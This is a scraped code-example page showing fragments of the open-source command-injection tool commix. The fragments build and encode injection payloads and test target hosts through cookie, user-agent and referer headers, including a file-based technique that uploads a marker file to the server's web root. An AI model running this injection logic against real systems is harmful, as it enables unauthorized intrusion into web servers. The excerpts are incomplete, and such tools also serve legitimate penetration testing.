payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
payload = payload + TAG + ""
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
else:
payload = re.sub(" ", "%20", payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
sys.stdout.write("\n" + settings.print_payload(payload))
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
#.........这里部分代码省略.........
开发者ID:HugoDelval,项目名称:commix,代码行数:101,代码来源:eb_handler.py
示例14: fb_injection_handler
#.........这里部分代码省略.........
if not settings.LOAD_SESSION:
i = i + 1
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
info_msg = "Trying to upload the '" + OUTPUT_TEXTFILE
info_msg += "' file on '" + settings.SRV_ROOT_DIR + "'..."
print settings.print_info_msg(info_msg)
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulne
|
请发表评论